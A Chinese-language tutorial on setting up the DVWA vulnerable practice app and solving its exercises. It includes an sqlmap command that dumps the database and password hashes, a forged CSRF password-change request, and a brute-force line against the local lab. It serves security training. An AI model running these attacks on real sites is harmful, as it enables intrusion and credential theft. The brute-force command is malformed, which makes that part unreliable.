一、DVWA安装教程
1、首先下载DVWA压缩包,解压到Web服务器的www目录下;
cd /var/www/ wget https://github.com/ethicalhack3r/DVWA/archive/master.zip unzip master.zip mv DVWA-master dvwa cd dvwa cp config/config.inc.php.dist config/config.inc.php
2、修改配置文件中的相关设置;
vim config/config.inc.php
3、在浏览器中访问localhost/dvwa/setup.php,进行DVWA的设置
二、DVWA通关
1、注入攻击:打开DVWA的SQL Injection模块,使用工具进行注入攻击,获得管理员权限。
sqlmap -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --level=5 --risk=3 --dbms=mysql --os=linux --current-db --current-user --passwords --dump
2、XSS攻击:打开DVWA的XSS Reflected模块,尝试在输入框输入JavaScript代码,以达到攻击效果。
3、CSRF攻击:使用BurpSuite进行攻击,构造Post请求,模拟受害者在攻击网站中执行此请求,达到攻击效果。
POST /dvwa/vulnerabilities/csrf/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/dvwa/vulnerabilities/csrf/ security=low&form=submit&password_new=test&password_conf=test
三、DVWA全级别教程
1、低安全性:完成注入攻击,获取管理员权限。
2、中等安全性:尝试注入攻击失败,需要使用布尔盲注等更高级的攻击方式。
3、高安全性:禁用一些常用的攻击方式,需要使用更加高级的攻击方式在系统中进行攻击。
四、DVWA搭建教程
在本地或者云服务器上安装Web服务器,按照上述方法安装DVWA,即可进行DVWA靶场的搭建。
五、DVWA靶场过关教程
根据DVWA的说明文档,逐个完成相关模块的攻击过关。
六、DVWA教程
通过DVWA,了解如何攻击和防御Web系统常见的漏洞,提升攻防水平。
七、DVWA暴力破解教程
使用工具进行暴力破解,例如使用BurpSuite,构造额外有指定字典和延迟时间的暴力破解请求:
python3 /root/tools/Seclists/Passwords/darkweb2017-top10000.txt /root/tools/Seclists/Passwords/darkweb2017-top10000.txt 4 'http://localhost:80/dvwa/vulnerabilities/brute/?username=admin&password=FUZZ&Login=Login&user_token=717bfe2f186df7252886661a62ab8cc2' brute-force
最新评论